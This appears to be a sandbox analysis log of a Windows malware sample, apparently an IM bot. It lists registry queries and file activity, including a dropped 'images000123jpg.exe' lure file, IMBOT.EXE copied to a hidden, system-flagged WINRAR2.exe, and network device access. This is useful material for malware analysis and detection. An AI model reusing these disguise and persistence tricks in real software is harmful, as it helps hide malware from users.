HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.txt "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.vb ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.vb "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.vb "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.vb "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.wmf ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.wmf "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.wmf "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.wmf "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.wrn ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.wrn "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.wrn "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.wrn "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xls ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xls "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xls "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xls "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xlt ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xlt "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xlt "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xlt "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xml ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xml "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xml "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xml "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xsd ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xsd "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xsd "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xsd "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\calendar ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\calendar "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\calendar "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\calendar "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\communications ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\communications "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\communications "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\communications "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\contact ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\contact "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\contact "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\contact "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\document ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\document "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\document "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\document "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\email ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\email "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\email "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\email "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\favorite ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\favorite "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\favorite "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\favorite "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\folder ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\folder "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\folder "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\folder "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\im ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\im "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\im "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\im "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\images ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\images "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\images "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\images "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\music ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\music "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\music "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\music "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\note ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\note "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\note "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\note "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\picture ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\picture "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\picture "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\picture "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\presentation ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\presentation "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\presentation "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\presentation "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\program ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\program "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\program "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\program "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\spreadsheet ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\spreadsheet "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\spreadsheet "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\spreadsheet "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\text ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\text "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\text "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\text "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\video ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\video "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\video "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\video "ScriptOk"
HKEY_LOCAL_MACHINE\SYSTEM\WPA\MediaCenter "Installed"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework "InstallRoot"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework "CLRLoadLogDir"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework "OnlyUseLatestCLR"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\.NETFramework\Performance "First Counter"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\.NETFramework\Performance "First Help"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib "EventLogLevel"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib "TotalInstanceName"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\PerfProc\Performance "DisplayHeapPerfObject"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\PerfProc\Performance "ProcessNameFormat"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\PerfProc\Performance "ThreadNameFormat"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\PSched\Performance "First Counter"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\PSched\Performance "First Help"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\SecurityService "10"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders "SecurityProviders"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "Name"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "Comment"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "Capabilities"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "RpcId"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "Version"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "Type"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "TokenSize"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "Name"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "Comment"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "Capabilities"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "RpcId"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "Version"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "Type"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "TokenSize"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "Name"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "Comment"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "Capabilities"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "RpcId"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "Version"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "Type"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "TokenSize"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\RSVP\Performance "First Counter"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\RSVP\Performance "First Help"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Telephony "Perf1"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Telephony "Perf2"
HKEY_PERFORMANCE_DATA "230 784"
HKEY_LOCAL_MACHINE\SYSTEM\WPA\MediaCenter "Installed"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework "InstallRoot"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework "CLRLoadLogDir"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework "OnlyUseLatestCLR"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\.NETFramework\Performance "First Counter"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\.NETFramework\Performance "First Help"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib "EventLogLevel"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib "TotalInstanceName"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\PerfProc\Performance "DisplayHeapPerfObject"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\PerfProc\Performance "ProcessNameFormat"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\PerfProc\Performance "ThreadNameFormat"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\PSched\Performance "First Counter"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\PSched\Performance "First Help"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\SecurityService "10"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SecurityProviders "SecurityProviders"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "Name"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "Comment"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "Capabilities"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "RpcId"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "Version"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "Type"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msapsspc.dll "TokenSize"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "Name"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "Comment"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "Capabilities"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "RpcId"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "Version"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "Type"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\digest.dll "TokenSize"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "Name"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "Comment"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "Capabilities"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "RpcId"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "Version"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "Type"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\SspiCache\msnsspc.dll "TokenSize"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\RSVP\Performance "First Counter"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\RSVP\Performance "First Help"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Telephony "Perf1"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Telephony "Perf2"
HKEY_PERFORMANCE_DATA "230 784"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\SecurityService "DefaultAuthLevel"
Enums HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Search\ProtocolHandlers
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Search\ProtocolHandlers\File
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\AppPatch
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\AppPatch
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy


File Changes by all processes
New Files c:\images000123jpg.exe
C:\WINDOWS\CIMBOT.EXE
C:\WINDOWS\IMBOT.EXE
\Device\Tcp
\Device\Ip
\Device\Ip
\Device\Gpc
\Device\Tcp6
C:\WINDOWS\WINRAR2.exe
\Device\Tcp
\Device\Ip
\Device\Ip
\Device\Gpc
\Device\Tcp6
\Device\RasAcd
Opened Files C:\WINDOWS\Registration\R000000000007.clb
C:\WINDOWS\system32\de-DE\wshom.ocx.mui
C:\WINDOWS\system32\wshom.ocx
C:\WINDOWS\system32\stdole2.tlb
C:\WINDOWS\CIMBOT.EXE
\\.\PIPE\wkssvc
\\.\PIPE\lsarpc
C:\Programme\Windows Desktop Search\MSNLNamespaceMgr.dll
C:\WINDOWS\Registration\R000000000007.clb
C:\WINDOWS\AppPatch\sysmain.sdb
C:\WINDOWS\AppPatch\systest.sdb
\Device\NamedPipe\ShimViewer
C:\WINDOWS\
C:\WINDOWS\IMBOT.EXE.config
C:\WINDOWS\IMBOT.EXE
\\.\Ip
\\.\PIPE\EVENTLOG
\\.\PIPE\ROUTER
C:\WINDOWS\AppPatch\sysmain.sdb
C:\WINDOWS\AppPatch\systest.sdb
\Device\NamedPipe\ShimViewer
C:\WINDOWS\
C:\WINDOWS\WINRAR2.exe.config
C:\WINDOWS\WINRAR2.exe
\\.\Ip
\\.\PIPE\EVENTLOG
\\.\PIPE\ROUTER
C:\WINDOWS\WINRAR2.exe
Deleted Files C:\WINDOWS\CIMBOT.EXE
Chronological Order Get File Attributes: C:\WINDOWS\Registration Flags: (SECURITY_ANONYMOUS)
Open File: C:\WINDOWS\Registration\R000000000007.clb (OPEN_EXISTING)
Open File: C:\WINDOWS\system32\de-DE\wshom.ocx.mui (OPEN_EXISTING)
Open File: C:\WINDOWS\system32\wshom.ocx (OPEN_EXISTING)
Open File: C:\WINDOWS\system32\stdole2.tlb (OPEN_EXISTING)
Create/Open File: c:\images000123jpg.exe (OPEN_ALWAYS)
Get File Attributes: C:\WINDOWS\system32\.HLP Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:\WINDOWS\Help\.HLP Flags: (SECURITY_ANONYMOUS)
Create File: C:\WINDOWS\CIMBOT.EXE
Open File: C:\WINDOWS\CIMBOT.EXE (OPEN_EXISTING)
Create File: C:\WINDOWS\IMBOT.EXE
Delete File: C:\WINDOWS\CIMBOT.EXE
Open File: \\.\PIPE\wkssvc (OPEN_EXISTING)
Get File Attributes: c:\ Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:\WINDOWS\IMBOT.EXE Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:\WINDOWS\ Flags: (SECURITY_ANONYMOUS)
Open File: \\.\PIPE\lsarpc (OPEN_EXISTING)
Get File Attributes: C:\Dokumente und Einstellungen\Administrator\Eigene Dateien\desktop.ini Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:\Dokumente und Einstellungen\All Users\Dokumente\desktop.ini Flags: (SECURITY_ANONYMOUS)
Open File: C:\Programme\Windows Desktop Search\MSNLNamespaceMgr.dll (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\Registration Flags: (SECURITY_ANONYMOUS)
Open File: C:\WINDOWS\Registration\R000000000007.clb (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\IMBOT.EXE:Zone.Identifier Flags: (SECURITY_ANONYMOUS)
Open File: C:\WINDOWS\AppPatch\sysmain.sdb (OPEN_EXISTING)
Open File: C:\WINDOWS\AppPatch\systest.sdb (OPEN_EXISTING)
Open File: \Device\NamedPipe\ShimViewer (OPEN_EXISTING)
Open File: C:\WINDOWS\ ()
Find File: C:\WINDOWS\IMBOT.EXE
Get File Attributes: C:\WINDOWS\system32\mscoree.dll.local Flags: (SECURITY_ANONYMOUS)
Open File: C:\WINDOWS\IMBOT.EXE.config (OPEN_EXISTING)
Open File: C:\WINDOWS\IMBOT.EXE (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727 Flags: (SECURITY_ANONYMOUS)
Find File: C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
Create/Open File: \Device\Tcp (OPEN_ALWAYS)
Create/Open File: \Device\Ip (OPEN_ALWAYS)
Create/Open File: \Device\Ip (OPEN_ALWAYS)
Open File: \\.\Ip (OPEN_EXISTING)
Create/Open File: \Device\Gpc (OPEN_ALWAYS)
Create/Open File: \Device\Tcp6 (OPEN_ALWAYS)
Open File: \\.\PIPE\EVENTLOG (OPEN_EXISTING)
Open File: \\.\PIPE\ROUTER (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\WINRAR2.exe Flags: (SECURITY_ANONYMOUS)
Copy File: C:\WINDOWS\IMBOT.EXE to C:\WINDOWS\WINRAR2.exe
Set File Attributes: C:\WINDOWS\WINRAR2.exe Flags: (FILE_ATTRIBUTE_HIDDEN FILE_ATTRIBUTE_READONLY FILE_ATTRIBUTE_SYSTEM SECURITY_ANONYMOUS)
Open File: C:\WINDOWS\AppPatch\sysmain.sdb (OPEN_EXISTING)
Open File: C:\WINDOWS\AppPatch\systest.sdb (OPEN_EXISTING)
Open File: \Device\NamedPipe\ShimViewer (OPEN_EXISTING)
Open File: C:\WINDOWS\ ()
Find File: C:\WINDOWS\WINRAR2.exe
Get File Attributes: C:\WINDOWS\system32\mscoree.dll.local Flags: (SECURITY_ANONYMOUS)
Open File: C:\WINDOWS\WINRAR2.exe.config (OPEN_EXISTING)
Open File: C:\WINDOWS\WINRAR2.exe (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727 Flags: (SECURITY_ANONYMOUS)
Find File: C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
Create/Open File: \Device\Tcp (OPEN_ALWAYS)
Create/Open File: \Device\Ip (OPEN_ALWAYS)
Create/Open File: \Device\Ip (OPEN_ALWAYS)
Open File: \\.\Ip (OPEN_EXISTING)
Create/Open File: \Device\Gpc (OPEN_ALWAYS)
Create/Open File: \Device\Tcp6 (OPEN_ALWAYS)
Open File: \\.\PIPE\EVENTLOG (OPEN_EXISTING)
Open File: \\.\PIPE\ROUTER (OPEN_EXISTING)
Create/Open File: \Device\RasAcd (OPEN_ALWAYS)
Open File: C:\WINDOWS\WINRAR2.exe (OPEN_EXISTING)